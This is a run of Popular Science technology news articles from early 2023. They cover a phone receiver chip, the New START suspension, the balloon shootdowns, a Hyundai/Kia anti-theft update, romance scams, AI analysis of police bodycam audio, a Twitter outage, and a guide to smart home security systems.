“Well, a similar thing happens with the wireless signals all around us,” he explains. “Devices like your iPhone need to detect signals from WiFi, Bluetooth, GPS, and 5G radio, but these signals can interfere with each other. To detect all the signals, your device needs multiple bulky filters outside the chip, which can be expensive.”

These necessary bulky filters may be more accurate now. Araei’s team developed a new method to bring the filtering technology within the chip itself to cover a large spectrum of frequencies. The improved design could greatly reduce production costs, make devices smaller and more efficient, and potentially even improve battery life.

“In short, our research can make your devices work better with fewer dropped calls or poor connections caused by interference from other devices,” says Araei.

The team’s advances work using something called a “mixer-first architecture” to identify and block unwanted interferences without harming a phone’s performance. In this setup, a radio frequency signal is converted into a lower frequency as soon as it is received by a device. From there, the signal’s digital bits are extracted via an analog-to-digital converter.

As useful as that is, there’s still the issue of harmonic interference to solve, which refers to  signals possessing bandwidths that are multiples of a specific device’s operating frequency. A phone operating at 1 gigahertz (GHz), for example, has harmonic inferences caused by signals at 2, 3, 4(and so on) GHz. During the signal conversion, these harmonic interferences can be virtually indistinguishable from the actual intended frequency, and muck up the whole process.

[Related: AT&T just shut down its 3G network. Here’s how it could affect your car.]

MIT researchers combined the mixer-first architecture alongside other techniques such as capacitor stacking and charge sharing to block harmonic interference issues while not losing any of the desired information.

“People have used these techniques, charge sharing and capacitor stacking, separately before, but never together. We found that both techniques must be done simultaneously to get this benefit. Moreover, we have found out how to do this in a passive way within the mixer without using any additional hardware while maintaining signal integrity and keeping the costs down,” Araei also added.

To test out their new configurations, the team sent out a desired signal alongside harmonic interferences, then measured the novel chip’s abilities. The results were impressive—the upgraded device effectively blocked out the harmonics at a minimal loss of signal strength, while also being able to handle signals over 40 times more powerful than existing, state-of-the-art receivers. And all this from a piece of hardware that is far cheaper, smaller, and less production heavy than what’s currently available. Because it doesn’t require any additional hardware, the new architecture could also soon be manufactured easily at scale for future generations of smartphones, tablets, and laptops. 

The post A new smartphone chip could keep your cell signal alive in crowded places appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Putin is backing away from New START—here’s what that nuclear treaty does https://www.popsci.com/technology/us-russia-new-start-treaty-explained/ Tue, 21 Feb 2023 23:29:14 +0000 https://www.popsci.com/?p=514054
A B-52 seen in 2021. This bomber type is nuclear-capable.
A B-52 seen in 2021. This bomber type is nuclear-capable. Stephanie Serrano / US Air Force

The agreement between the US and Russia caps how many nuclear weapons each country can deploy.

The post Putin is backing away from New START—here’s what that nuclear treaty does appeared first on Popular Science.

]]>
A B-52 seen in 2021. This bomber type is nuclear-capable.
A B-52 seen in 2021. This bomber type is nuclear-capable. Stephanie Serrano / US Air Force

Today, President Vladimir Putin of Russia announced that the country would suspend participation in New START, the last standing major arms control treaty between the country and the United States. Putin clarified that the suspension was not a withdrawal—but the suspension itself represents a clear deterioration of trust and nuclear stability between the countries with the world’s two largest nuclear arsenals. 

Putin’s remarks precede by a few days the anniversary of the country’s invasion of Ukraine, an entirely chosen war that has seen some concrete Russian gains, while many of Russia’s biggest advances have been repulsed and overtaken. At present, much of the fighting is in the form of grinding, static warfare along trenches and defended positions in Ukraine’s east. It is a kind of warfare akin to the bloody fronts of World War I, though the presence of drones and long-range precision artillery lend it an undeniably modern character.

Those modern weapons, and the coming influx of heavy tanks from the United States and other countries to Ukraine, put Putin’s remarks in some more immediate context. While New START is specifically an agreement between the United States and Russia over nuclear arsenals, the decision to suspend participation comes against the backdrop of the entirely conventional war being fought by Russia against Ukraine, with US weapons bolstering the Ukrainian war effort.

A follow-up statement from Russia’s Ministry of Foreign Affairs clarified that the country would still notify the United States about any launches of Intercontinental or Submarine-Launched Ballistic Missiles (ICBMs and SLBMs), and would expect the same in reverse, in accordance with a 1988 agreement between the US and the USSR. That suggests there is at least some ongoing effort to not turn a suspension of enforcement into an immediate crisis.

To understand why the suspension matters, and what future there is for arms control, it helps to understand the agreement as it stands.

What is New START?

New START is an agreement between the United States and the Russian Federation, which carries a clunky formal name: The Treaty between the United States of America and the Russian Federation on Measures for the Further Reduction and Limitation of Strategic Offensive Arms. The short-form name, which is not really a true acronym, is instead a reference to START 1, or the Strategic Arms Reduction Treaty, was in effect from 1991 to 2009, and which New START replaced in 2011. New START is set to expire in 2026, unless it is renewed by both countries.

New START is the latest of a series of agreements limiting the overall size of the US and Russian (first Soviet) nuclear arsenals, which at one point each measured in the tens of thousands of warheads. Today, thanks largely to mutual disarmament agreements and the limits outlined by New START, the US and Russia have arsenals of roughly 5,400 and 6,000 warheads, respectively. Of those, the US is estimated to have 1,644 deployed strategic weapons, a term that means nuclear warheads on ICBMs or at heavy bomber bases, presumably ready to launch at a moment’s notice. Russia is estimated to have around 1,588 deployed strategic weapons.

As the Start Department outlines, the treaty limits both countries to 700 total deployed ICBMs, SLBMs, and bombers capable of carrying nuclear weapons. (Bombers are counted under the treaty in the same way as a missile with one warhead, though nuclear-capable bombers like the B-52, B-2, and soon to be B-21 can carry multiple warheads.) In addition, the treaty sets a limit of 1,550 nuclear warheads on deployed ICBMs, deployed SLBMs, and deployed heavy bombers equipped for nuclear armaments, as well as 800 deployed and non-deployed ICBM launchers, SLBM launchers, and heavy bombers equipped for nuclear armaments

In its follow-up statement to the suspension of New START, Russia’s Ministry of Foreign Affairs clarified it would stick to the overall cap on warheads and launch systems as outlined in the treaty.

What will change is the end of inspections, which have been central to the “trust but verify” structure of arms control agreements between the US and Russia for decades. The terms of New START allow both countries to inspect deployed and non-deployed strategic systems (like missiles or bombers) up to 10 times a year, as well as non-deployed systems up to eight times a year. These on-site inspections were halted in April 2020 in response to the COVID-19 pandemic, and their resumption is the most likely act threatened by this change in posture.

It is unclear, yet, if this suspension means the end of the treaty forever, though Putin taking such a step certainly doesn’t bode well for its continued viability. Should New START formally end, some analysts fear it may usher in a new era of nuclear weapons production, and a rapid expansion of nuclear arsenals.

While that remains a possibility, the hard limits of nuclear production, as well as decades of faded production expertise in both Russia and the United States, mean such a restart may be more intensive, in time and resources, than immediately feared. Both nations have spent the last 30 years working on production of conventional forces. Ending an arms control treaty over nuclear weapons would be a gamble, suggesting nuclear weapons are the only tool that can provide security where conventional arms have failed

The post Putin is backing away from New START—here’s what that nuclear treaty does appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Biden says flying objects likely not ‘related to China’s spy balloon program’ https://www.popsci.com/technology/president-biden-speaks-about-unidentified-objects/ Thu, 16 Feb 2023 21:22:11 +0000 https://www.popsci.com/?p=513047
An F-22 in flight on Dec. 3, 2022.
An F-22 in flight on Dec. 3, 2022. Kaitlyn Lawton / US Air Force

The presidential address also noted that the increase in UAP sightings were due in part to "enhancing our radar to pick up more slow-moving objects."

The post Biden says flying objects likely not ‘related to China’s spy balloon program’ appeared first on Popular Science.

]]>
An F-22 in flight on Dec. 3, 2022.
An F-22 in flight on Dec. 3, 2022. Kaitlyn Lawton / US Air Force

Since February 4, United States aircraft have shot down four objects passing over North American skies. The first of these, a massive high-altitude surveillance balloon traced to China, meandered over the country for four days before becoming the first air-to-air kill for the high-end F-22 stealth jet fighter. The other three, however, have not yet been identified, except for their size, altitude, and ability to stay aloft seemingly on wind power alone.

President Joe Biden addressed the topic in remarks delivered today. “Last week, in the immediate aftermath of the incursion by China’s high altitude balloon, our military, through the North American Aerospace Defense command, so called NORAD, closely scrutinized our airspace, including enhancing our radar to pick up more slow-moving objects above our country and around the world,” he said. “In doing so they tracked three unidentified objects—one in Alaska, Canada, and over Lake Huron in the Midwest.” 

“They acted in accordance with established parameters for determining how to deal with unidentified aerial objects in US airspace,” he added. “At their recommendation, I gave the order to take down the three objects, due to hazards to civilian commercial air traffic, and because we could not rule out the surveillance risk of sensitive facilities.”

[Related: How high do planes fly? It depends on if they’re going east or west.]

Given the short timeline between the tracking of China’s high altitude balloon and the following shootdowns, expanding the aperture of existing sensors was the most expected way to widen what swaths of the sky could be observed. One effect of that is suddenly detecting objects previously unobserved. Notably, Biden highlighted that the newly found objects were slow-moving. NORAD’s sensors, for decades trained to track fast moving planes and missiles, are not calibrated by default to look for balloons, which drift through the sky.

“Our military, and the Canadian military, are seeking to recover the debris so we can learn more about these three objects,” said Biden. “We don’t yet know exactly what these three objects were but nothing right now suggests they were related to China’s spy balloon program or that they were surveillance vehicles from any other country.”

Minutes before Biden gave his remarks, Aviation Week published a plausible explanation of the objects. The story notes that the Northern Illinois Bottlecap Balloon Brigade, a hobbyist club, had tracked a high-altitude pico balloon they had launched to the coast of Alaska at just under 40,000 feet on February 10. Predicted wind direction would have brought that balloon over the Yukon on February 11.

That, notes Aviation Week, was “the same day a Lockheed Martin F-22 shot down an unidentified object of a similar description and altitude in the same general area.”

“Launching high-altitude, circumnavigational pico balloons has emerged only within the past decade,” continues the story. “At any given moment, several dozen such balloons are aloft, with some circling the globe several times before they malfunction or fail for other reasons. The launch teams seldom recover their balloons.”

While Biden did not name what the downed objects were, he said that the intelligence community’s most likely estimate was that these three objects were most likely balloons with ties to private companies, recreation, or research institutions.

“I want to be clear: We don’t have any evidence that there has been a sudden increase in the number of objects in the sky, we’re now just seeing more of them partially because of the steps we’ve taken to increase our radar, and we have to keep adapting to dealing with these challenges,” he said.

While the larger surveillance balloon from China was easier to track based on its mass alone, the existence of small, potentially hobbyist or commercial balloons riding high-altitude winds appears to come as something of a surprise. 

“In the U.S., academic and commercial balloons have to include transponders that let the FAA know where they are at all times,”Jeff Jackon, a US representative from North Carolina, shared in his notes on a congressional briefing with NORAD on the Unidentified Aerial Phenomena (UAP). “These UAPs did not appear to have transponders, and that was also a factor in the decision to shoot them down.”

Transponders are a key tool for larger aircraft, as they make air traffic visible to people in the sky and on the ground. For something as light as a hobbyist research balloon aiming at high altitude, the weight of a transponder and the batteries to power it could strain the craft. Finding a different solution, one that allows air traffic controllers and pilots to avoid such balloons, is a likely first step to ensuring the skies remain safe and the objects don’t go unidentified. 

Transponders wouldn’t solve the problem of balloons sent with malicious intent, but it does at least allow those with purely peaceful purposes to be affirmatively identified as safe. Biden outlined a set of policies to avoid shootdowns like those experienced this month. One improvement would be an accessible inventory of objects in the airspace above the US, kept up to date. Another would be improving the ability of the US to detect uncrewed objects, like small high-altitude balloons. Changing the rules for launching and maintaining objects would also help the US get hobbyist launches, like that from the Northern Illinois Bottlecap Balloon Brigade, on its radar, metaphorically and perhaps literally. Finally, Biden suggested the US work with other countries to set out better global norms for airspace.  

“We’re not looking for a new Cold War,” said Biden. “But we will compete, and we will responsibly manage that competition so it doesn’t veer into conflict.”

In the history of high-altitude surveillance from the last Cold War, efforts to spy by balloon and plane led to crisis. The rules and norms allowing countries to share space, instead, allowed countries to keep spying on each other, while also fostering tremendous economic and scientific developments alongside the spycraft.

Watch the address, below:

The post Biden says flying objects likely not ‘related to China’s spy balloon program’ appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
A software update could make your Hyundai or Kia harder to steal https://www.popsci.com/technology/hyundai-kia-software-update-stop-car-theft/ Wed, 15 Feb 2023 23:00:00 +0000 https://www.popsci.com/?p=512752
A Kia in Minneapolis
weston m / Unsplash

The patch will be free. Here's what it does.

The post A software update could make your Hyundai or Kia harder to steal appeared first on Popular Science.

]]>
A Kia in Minneapolis
weston m / Unsplash

South Korean automakers Hyundai and Kia have developed a software fix that is intended to stop a recent social-media-fueled theft wave. Over the past few years, thousands of Hyundai and Kia vehicles have been stolen as videos demonstrating how easy certain models were to start without a key spread on YouTube and TikTok. According to the National Highway Traffic Safety Administration (NHTSA), the fix will be available free of charge and will roll out over the coming months.

Most modern cars are fitted with an immobilizer system that prevents them from being hot wired or started without the correct key. A chip in the key communicates with the electronic control unit (ECU) in the car’s engine. When the driver attempts to start the car, either by turning the key or pushing a button, the chip sends a signal confirming that they are using the right key for the car, and the ECU allows the engine to start. If a thief tries to start a car without the correct key—say, using a screwdriver—then the ECU doesn’t receive the signal and prevents the vehicle from turning on. While immobilizers won’t stop dedicated, technologically advanced thieves, they make it much harder for opportunists.

Unfortunately for car owners, the Hyundai and Kia models targeted in the recent thefts don’t have an immobilizer. The simple chip system in the key can be bypassed by connecting a USB phone charger to a specific circuit accessible in the steering column, and the car can then be started with a screwdriver. 

According to a report by CNBC last year, police around the country have noted a sharp spike in TikTok-inspired thefts. The fallout was bad enough that multiple cities have pursued legal action against the two Korean automakers. There’s also a class action lawsuit, and some insurance companies are refusing to cover the impacted models. NHTSA claims that there have been at least 14 crashes and eight deaths. 

According to NHTSA, the software fix will roll out to the approximately 3.8 million affected Hyundais and 4.5 million affected Kias in a number of phases starting later this month. The specific models aren’t being widely publicized for somewhat obvious reasons, but they are mostly the more affordable ones that use a mechanical key rather than a fob and push-button. If you want to learn more about your vehicle, NHTSA recommends contacting Hyundai (800-633-5151) or Kia (800-333-4542) for more information.

The update makes two changes to the theft alarm software in the cars. It increases the length of time the alarm sounds from 30 seconds to one minute and also prevents the car from starting if the key isn’t in the ignition. 

This isn’t the first time that a software update has been used to add anti-theft features to a line of cars. Back in 2021, Dodge rolled out an update to its high horsepower Charger and Challenger models that were apparently being targeted by key-spoofing thieves. While already fitted with an immobilizer, the update added an additional layer of protection that limited the engines to just three horsepower if the correct pin wasn’t entered.

As well as the software update, affected Hyundai and Kia customers will receive a window sticker to alert would-be thieves that the vehicle has the anti-theft measures installed. While it won’t add any extra security, it might stop some thieves before they break a car window. 

In a more old school fix, Hyundai and Kia have also been working with law enforcement agencies to provide more than 26,000 steering wheel locks to affected vehicle owners. The steering wheel locks have been sent to 77 agencies in 12 states. The Department of Transportation’s NHTSA suggests contacting local law enforcement to see if one is available if you own an affected car. 

The post A software update could make your Hyundai or Kia harder to steal appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Don’t fall for an online love scam this Valentine’s Day https://www.popsci.com/technology/ftc-romance-scams-report/ Tue, 14 Feb 2023 14:30:00 +0000 https://www.popsci.com/?p=511963
Woman covering face with hands in frustration while sitting in front of laptop on an office desk.
Online romance scammers like to claim they are deployed overseas in the military or need help with a family emergency. Deposit Photos

A new report from the FTC highlights the telltale signs of suspicious online romance. Hot tip: avoid any crypto requests.

The post Don’t fall for an online love scam this Valentine’s Day appeared first on Popular Science.

]]>
Woman covering face with hands in frustration while sitting in front of laptop on an office desk.
Online romance scammers like to claim they are deployed overseas in the military or need help with a family emergency. Deposit Photos

Just in time for Valentine’s Day, the heartbreakers at the Federal Trade Commission recently released their latest report on online romance scammers and the aftermath of their schemes. According to the FTC’s statistics, almost 70,000 people reported falling for romantic scams amounting to $1.3 billion in personal losses. The median loss for individuals tallied up to around $4,400 per person.

As the FTC report details, con artists are constantly improving their tactics and are frequently scouring social media platforms such as Facebook, Twitter, and Instagram for personal information on their targets. As such, they approach their potential victims armed with quick, seemingly meant-to-be similarities. “You like a thing, so that’s their thing, too. You’re looking to settle down. They’re ready too,” explains Emma Fletcher, author of the FTC’s Data Spotlight rundown.

[Related: Cryptocurrency scammers are mining dating sites for victims.]

After approaching people via these digital venues, conversations often transfer over to messaging apps like Telegram, Google Chat, or WhatsApp. From there, malicious scammers try to elicit money, more personal details, alongside potentially explicit images and videos which they can then use for blackmailing—a tactic often referred to as “sextortion.”

Unsurprisingly, the vast majority of payments sent to scam artists came in the form of cryptocurrency and wire transfers, given their highly anonymized natures. Other runners-up include gift card requests and asking for payment to cover a nonexistent package’s shipping costs.

The FTC conducted a breakdown of scammers’ preferred storylines via keyword analysis based on over 8 million romance scam reports resulting in monetary losses. Nearly a quarter of lies stem from someone claiming a friend or relative is sick, hurt, or in jail. Grifters also like to claim they can teach victims how to invest, are deployed overseas in the military, or have recently come into some fortune they inexplicably want to share.

[Related: Social media scammers made off with $770 million last year.]

Anyone hoping to avoid becoming a lovelorn statistic should abide by a few straightforward rules: First off, virtually no one is going to out-of-the-blue request money or investment opportunities via crypto or gift cards—swipe left if a suitor ever does. Vet your potential lover’s stories by friends and family to see if anyone raises an eyebrow, and trust those suspicions.

Lastly, the FTC also suggests a rather ingenious bit of amateur sleuthing if you ever start getting second thoughts: Conduct a reverse image search if a pursuer ever offers any supposed photographs or selfies. If the stories don’t line up, then it’s time to wade elsewhere in the online dating pool.

The post Don’t fall for an online love scam this Valentine’s Day appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Police are paying for AI to analyze body cam audio for ‘professionalism’ https://www.popsci.com/technology/police-body-cam-ai-truleo/ Fri, 10 Feb 2023 15:00:00 +0000 https://www.popsci.com/?p=510118
Chest of police officer in uniform wearing body camera next to police car.
Truleo transcribes bodycam audio, then classifies police-civilian interactions. Jonathan Wiggs/The Boston Globe via Getty Images

Law enforcement is using Truleo's natural language processing AI to analyze officers' interactions with the public, raising questions about efficacy and civilian privacy.

The post Police are paying for AI to analyze body cam audio for ‘professionalism’ appeared first on Popular Science.

]]>
Chest of police officer in uniform wearing body camera next to police car.
Truleo transcribes bodycam audio, then classifies police-civilian interactions. Jonathan Wiggs/The Boston Globe via Getty Images

An increasing number of law enforcement departments are reportedly turning to artificial intelligence programs to monitor officers’ interactions with the public. According to multiple sources, police departments are specifically enlisting Truleo, a Chicago-based company which offers AI natural language processing for audio transcription logs ripped from already controversial body camera recordings. The partnership raises concerns regarding data privacy and surveillance, as well as efficacy and bias issues that come with AI automation.

Founded in 2019 through a partnership with FBI National Academy Associates, Inc., Truleo now possesses a growing client list that already includes departments in California, Alabama, Pennsylvania, and Florida. Seattle’s police department just re-upped on a two-year contract with the company. Police in Aurora, Colorado—currently under a state attorney general consent decree regarding racial bias and excessive use of force—are also in line for the software, which reportedly costs roughly $50 per officer, per month.

[Related: Police body cameras were supposed to build trust. So far, they haven’t.]

Truleo’s website says it “leverages” proprietary natural language processing (NLP) software to analyze, flag, and categorize transcripts of police officers’ interactions with citizens in the hopes of improving professionalism and efficacy. Transcript logs are classified based on certain parameters, and presented to customers via detailed reports to use as they deem appropriate. For example, Aurora’s police chief, Art Avecedo, said in a separate interview posted on Truleo’s website that the service can “identify patterns of conduct early on—to provide counseling and training, and the opportunity to intervene [in unprofessional behavior] far earlier than [they’ve] traditionally been able to.”

Speaking to PopSci over the phone, Anthony Tassone, Truleo’s co-founder and CEO, stressed Truleo software “relies on computers’ GPU” and is only installed within a police department’s cloud environment. “We don’t have logins or access to that information,” he says. Truleo’s sole intent, he says, is to provide textual analysis tools for police departments to analyze and assess their officers.

The company website offers example transcripts with AI-determined descriptions such as “formality,” “explanation,” “directed profanity,” and “threat.” The language detection skills also appear to identify actions such as pursuits, arrests, or medical attention requests. Examples of the program’s other classifications include “May I please see your license and registration?” (good) and “If you move from here I will break your legs” (bad).

AI photo
Professionalism vs. Risk Credit: Truleo

When asked about civilians’ rights to opt-out of this new form of employee development, however, Tassone cautions he would only be “speculating or guessing” regarding their options.

“I mean, I’m not a lawyer,” stresses Tassone when asked about civilians’ rights regarding opt-outs. “These questions are more for district attorneys, maybe police union attorneys. Once this information is captured on body camera data, you’re asking the question of really, ‘Who does it belong to?’”  

“Can civilians call [local departments] and ask to be removed? I don’t know,” he adds.

PopSci reached out to Alameda and Aurora law enforcement representatives for comment, and will update this post accordingly.

[Related: The DOJ is investigating an AI tool that could be hurting families in Pennsylvania.]

Michael Zimmer, associate professor and vice-chair of Marquette University’s Department of Computer Sciences, as well as the Director of the Center for Data, Ethics, and Society, urges caution in using the tech via an email PopSci

“While I recognize the good intentions of this application of AI to bodycam footage… I fear this could be fraught with bias in how such algorithms have been modeled and trained,” he says.

Zimmer questions exactly how “good” versus “problematic” interactions are defined, as well as who defines them. Given the prevalence of stressful, if not confrontational, civilian interactions with police, Zimmer takes issue with AI determining problematic officer behavior “based solely on bodycam audio interactions,” calling it “yet another case of the normalization of ubiquitous surveillance.”

Truleo’s website states any analyzed audio is first isolated from uploaded body cam footage through an end-to-end encrypted Criminal Justice Information Services (CJIS) compliant data transfer process. Established by the FBI in 1992, CJIS compliance guidelines are meant to ensure governmental law enforcement and vendors like Truleo protect individuals’ civil liberties, such as those concerning privacy and safety, while storing and processing their digital data. It’s important to note, however, that “compliance” is not a “certification.” CJIS compliance is assessed solely via the considerations of a company like Truleo along its law enforcement agency clients. There is no centralized authorization entity to award any kind of legally binding certification.

AI photo
Promotional material on Truleo’s website. Credit: Truleo

Regardless, Tassone explains the very nature of Truleo’s product bars its employees from ever accessing confidential information. “After we process [bodycam] audio, there is no derivative of data. No court can compel us to give anything, because we don’t keep anything,” says Tassone. “It’s digital exhaust—it’s ‘computer memory,’ and it’s gone.”

Truleo’s technology also only analyzes bodycam data it is voluntarily offered—what is processed remains the sole discretion of police chiefs, sergeants, and other Truleo customers. But Axios notes, the vast majority of body cam footage goes unreviewed unless there’s a civilian complaint or external public pressure, such as was the case in the death of Tyre Nichols. Even then, footage can remain difficult to acquire—see the years’ long struggle surrounding Joseph Pettaway’s death in Montgomery, Alabama.

[Related: Just because an AI can hold a conversation does not make it smart.]

Meanwhile, it remains unclear what, if any, recourse is available to civilians uncomfortable at the thought of their interactions with authorities being transcribed for AI textual analysis. Tassone tells PopSci he has no problem if a handful of people request their data be excluded from local departments’ projects, as it likely won’t affect Truleo’s “overall anonymous aggregate scores.”

“We’re looking at thousands of interactions of an officer over a one year period of time,” he offers as an average request. “So if one civilian [doesn’t] want their data analyzed to decide whether or not they were compliant, or whether they were upset or not,” he pauses. “Again, it really comes down to: The AI says, ‘Was this civilian complaint during the call?’ ‘Yes’ or ‘No.’ ‘Was this civilian upset?’ ‘Yes’ or ‘No.’ That’s it.”

The post Police are paying for AI to analyze body cam audio for ‘professionalism’ appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
Twitter announced some new features, then temporarily crashed https://www.popsci.com/technology/twitter-blue-features-crash/ Thu, 09 Feb 2023 16:00:00 +0000 https://www.popsci.com/?p=510983
Close up of twitter icon
Twitter Blue now has 4,000 character tweets and less ads. Deposit Photos

Twitter Blue subscribers can now post 4,000 character tweets and see fewer ads—but the news was quickly overshadowed by tech woes.

The post Twitter announced some new features, then temporarily crashed appeared first on Popular Science.

]]>
Close up of twitter icon
Twitter Blue now has 4,000 character tweets and less ads. Deposit Photos

Twitter announced the latest phase in its ongoing attempt to sell users on a premium subscription tier—4,000 character tweets, and half the ads. But yesterday’s impending Twitter Blue perks were literally lost within many users’ timelines, as some of the social media platform’s basic functions collapsed for roughly an hour-and-a-half.

Beginning around 4:30PM EST, many users reported encountering an error message telling them they were “over the daily limit for sending Tweets.” Meanwhile, others reported being unable to send direct messages, retweet other accounts, and access the TweetDeck platform. “Sorry for the trouble,” the Twitter Support account tweeted roughly an hour into the problems, adding that they were “aware and working to get this fixed.” Most, if not all, functionality has by now been restored, according to multiple outlets alongside the outage tracker, DownDetector.

[Related: Twitter’s latest bad idea will kill vital research and fun bot accounts.]

For Twitter Blue subscribers in the US, that means they should be able to begin taking advantage of the additional tweet real estate space with up to 4,000 character messages. For the time being, however, at the moment it doesn’t appear you can save those lengthier thoughts to your drafts, or schedule them for delayed posting. Twitter’s announcement also made clear that, while the feature is paywalled behind Blue’s $8 per month fee, anyone can read, retweet, and reply to the longer posts once they’re live.

Thankfully, the mini-blog option will remain visibly capped at the standard 280-character limit, with a button to expand the tweet into its lengthier final form. As TechCrunch notes, however, the new impending blend of 4,000-character posts and tweet “threads” could easily muddy users’ timelines more than they already are. Blue’s additional new promise of a 50-percent reduction in advertiser tweets might potentially alleviate that issue, although even $8 a month might feel too steep a price for most people used to what has always been a completely free service.

[Related: Meta sues data-scraping firm for selling user data to LAPD.]

Last week, Twitter CEO Elon Musk announced that the platform would begin paywalling access to its application program interface (API), supposedly beginning today. The decision was widely met with criticism from users, who argued it would likely kill the robust ecosystem of entertaining and informative bot accounts, alongside hobbling many researchers’ projects. As The Verge reports, the Twitter Dev account announced the API free tier would remain live until at least February 13, after which time users would be limited to generating “up to 1,500 Tweets per month.” A $100 per month tier for basic access would also soon follow, offering “low level of API usage and access to the Ads API.”

Security experts and general Twitter users have long dreaded Twitter’s dizzying changes and challenges following Musk’s acquisition of the company in October 2022 and subsequent axing of over half the platform’s global staff force of engineers and developers.

The post Twitter announced some new features, then temporarily crashed appeared first on Popular Science.

Articles may contain affiliate links which enable us to share in the revenue of any purchases made.

]]>
The best smart home security systems of 2023 https://www.popsci.com/gear/best-smart-home-security-systems/ Thu, 02 Feb 2023 18:00:00 +0000 https://www.popsci.com/?p=509217
A lineup of the best smart home security systems on a white background.
Amanda Reed

How smart is a home that doesn’t feel secure? Here’s how to feel safer in 2023 with the help of intelligent protective tech.

The post The best smart home security systems of 2023 appeared first on Popular Science.

]]>
A lineup of the best smart home security systems on a white background.
Amanda Reed

We may earn revenue from the products available on this page and participate in affiliate programs. Learn more ›

Best overall A white SimpliSafe 10-piece smart home security system on a blue and white background. SimpliSafe 10-Piece Wireless Home Security System
SEE IT

Comes with everything you need for security inside and outside your home.

Best customer service A Ring 14-piece security system on a blue and white background Ring Alarm Pro, 14-Piece
SEE IT

Talk to a real person and get your questions answered fast.

Best budget A Tolviviov smart home security system on a blue and white background Tolviviov Wi-Fi Door Alarm System
SEE IT

Easy to use for people of all technical skill levels.

If you’re worried about crime impacting your household, it makes perfect sense to buy one of the many smart home security systems that have popped up over the past few years. However, with abundance comes analysis paralysis. To what system should the savvy, safety-conscious consumer turn? We investigated the market to bring you the best smart home security systems so you can pick the best choice for your living situation and loved ones.

How we chose the best smart home security systems

While nearly every product you buy enters your home at some point, there is something particularly intimate about inviting in a smart home security system. Unlike shoes—something that only needs to function well enough when called upon—your smart home security system needs to function perfectly 24/7/365. That’s why one of the bigger ranking factors this time was brand satisfaction. Cybersecurity and data protection were other key factors because, while less is often more, in the world of security more really is more. You’re only as strong as your weakest entry point.

This guide was compiled after many hours of careful research; facts and opinions were cross-examined by editors. Ordinary users were asked about their experiences using these devices, and we interacted with customer service agents throughout the course of compiling this guide. Each company’s personal website and plan information were thoroughly checked for the most up-to-date service plan information possible.

The best smart home security systems: Reviews & Recommendations

Our selection of smart home security systems comes from a wide variety of well-known and trusted brands with a broad array of attached services. While kits differ, they all typically include sensors for your doors and/or windows and an alerting mechanism. One of our picks is sure to match your budget and lifestyle.

Best overall: SimpliSafe 10-Piece Wireless Home Security System

SimpliSafe

SEE IT

Why it made the cut: The SimpliSafe 10-Piece system is a very complete kit that starts the security before your door is opened.

Specs

  • Installation difficulty: Easy
  • Sensors: 4 door/window sensors, 2 motion sensors, 1 indoor camera, 1 outdoor camera
  • 24/7 professional monitoring: $28/mo. (Optional)
  • Smart protocols: N/A, but Alexa- and Nest-compatible

Pros

  • Outdoor cam so your security starts before an intruder enters your home
  • Comes with one free month of 24/7 professional monitoring service
  • The variety of parts gives you a more complete sense of security
  • Optics and branding

Cons

  • Must learn to set up each part correctly

If you’re looking for a system that is essentially complete directly out of the box, the SimpliSafe 10-Piece Wireless Home Security System is the kit for you. It includes a variety of sensors and indoor and outdoor cameras, meaning you should feel fully protected in your home. While each piece is easy to install in and of itself, you’ll have to learn and think about the placement of each part—however, you’ll be able to handle it on your own if you can handle a strip of 3M tape or a screwdriver. Let’s review each part individually to get a good picture of how they will function together in your home:

The SimpliSafe base can hold up to 100 SimpliSafe security devices and is the central hub for your equipment. It is also capable of emitting a 95dB alarm. The push-button keypad lets you arm and disarm the system with a PIN. Having four entry point door/window sensors will allow you to protect the primary entryways to your home, while the two motion sensors—which are designed to be pet friendly and decorative—protect the areas of your home with too many entry points or windows.

What makes the SimpliSafe 10-piece system better than the 12-piece version is the inclusion of both an indoor and an outdoor camera. Suppose you’re used to the grainy, near-worthless security cam footage often seen in local news coverage. In that case, you’ll be particularly happy with the full colors, 1080p quality, and night vision offered by SimpliSafe. For those concerned with privacy, the indoor camera comes with a stainless steel shutter, so you won’t have to worry about having your private moments enter someone’s data tables.

Finally, the package set comes with an official SimpliSafe flag that declares your home protected by SimpliSafe. While no one can guarantee that this will deter all criminals, there will be at least a few that will back down.

Best customer service: Ring Alarm Pro, 14-Piece

Ring

SEE IT

Why it made the cut: Go from dialing a number to “Hello” in 1 minute, 18 seconds.

Specs

  • Installation difficulty: Easy
  • Sensors: 8 door/window sensors, 2 motion sensors
  • 24/7 professional monitoring: Between $4-$20/mo. (Optional)
  • Smart protocols: Z-wave

Pros

  • Fantastic phone technical support
  • Dual keypads for increased flexibility
  • Provides range extender for large homes
  • Multiple 24/7 monitoring plans to choose from

Cons

  • Overhyped WiFi functionality

The Ring Alarm Pro 14-Piece set has fantastic customer service and is a great smart home security system for larger homes. Its impressive networking and dual keypad design (some home security systems only allow for one keypad) allow for larger coverage areas than some of the best smart home security systems. With customizable ringtones, you’ll always know which door is being opened in your home. The Ring Alarm Pro even comes with Wi-Fi 6 functionality via its hub. This feature is handy but gets a bit overhyped, sometimes eclipsing what counts—there are better Wi-Fi 6 routers out there.

What should you get excited about with the Ring Alarm Pro? A very approachable DIY setup where a real human is there to help you quickly. After just a few button taps to specify exactly what we wanted, we could—right here, right now—contact a customer service agent 1 minute and 18 seconds after dialing Ring’s customer service.

Best monitoring: ADT 8-Piece Wireless Home Security System

ADT

SEE IT

Why it made the cut: ADT is amongst the most experienced and best professional monitoring companies.

Specs

  • Installation difficulty: Intermediate
  • Sensors: 4 door/window sensors, 1 motion detector 
  • 24/7 professional monitoring: $19.99/mo. (Optional)
  • Smart protocols: Z-wave

Pros

  • Highly experienced monitoring team
  • Perfect size for families
  • Optics and branding

Cons

  • Occasional installation snags
  • Only works in the U.S.

The ADT 8-Piece Wireless Home Security System is all you need to get started with the highly regarded ADT security model. It’s a brand that takes itself seriously, providing a yard sign to let customers proudly display their security status on the lawn. Sure, it is part marketing, but it’s also part confidence in the ADT name alone being able to ward off potential neighborhood thieves.

